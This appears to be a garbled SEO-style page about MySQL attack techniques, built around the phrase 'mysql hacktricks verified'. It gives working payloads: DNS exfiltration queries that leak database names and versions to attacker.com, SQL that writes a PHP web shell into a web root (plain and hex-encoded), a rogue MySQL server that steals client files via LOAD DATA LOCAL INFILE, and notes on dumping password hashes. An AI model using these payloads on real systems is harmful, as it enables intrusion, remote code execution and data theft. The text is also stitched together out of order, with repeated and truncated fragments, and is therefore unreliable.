SELECT LOAD_FILE(CONCAT('\\\\', (SELECT database()), '.attacker.com\\fake.txt')); On your DNS server, monitor queries for dbname.attacker.com .
Use RogueMySQL or mysql-fake-server tools. The payload is:
SELECT unhex('3c3f7068702073797374656d28245f4745545b27636d64275d293b203f3e') INTO DUMPFILE '/var/www/html/shell2.php'; If secure_file_priv is NULL , you cannot use INTO OUTFILE . However, you can tamper with logs. mysql hacktricks verified
Use hex encoding to avoid illegal characters.
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'; If OUTFILE fails due to newline issues, use INTO DUMPFILE with hex: SELECT LOAD_FILE(CONCAT('\\\\', (SELECT database()), '
Keyword Focus: mysql hacktricks verified Introduction: Why "Verified" Matters In the world of cybersecurity, information is abundant, but accuracy is scarce. When searching for mysql hacktricks verified , you are not looking for theoretical vulnerabilities or outdated exploits. You are looking for battle-tested commands, bypasses, and privilege escalation paths that work against real-world MySQL and MariaDB deployments.
SELECT LOAD_FILE(CONCAT('\\\\', (SELECT hex(version())), '.attacker.com\\test')); If error-based or union-based injection fails, try Time-based + DNS. But for direct DB access, use the sys_exec UDF to run nslookup or curl . Part 4: Lateral Movement and Credential Harvesting 4.1 Dumping Password Hashes MySQL stores credentials in mysql.user . Hash types: mysql_native_password (SHA1-based) or caching_sha2_password (MySQL 8+). However, you can tamper with logs
Your fake server sends a LOAD DATA LOCAL INFILE request during handshake. Vulnerable clients (e.g., old PHP mysqli with allow_local_infile=ON , MySQL Workbench, or outdated connectors) will send back any file the client user can read.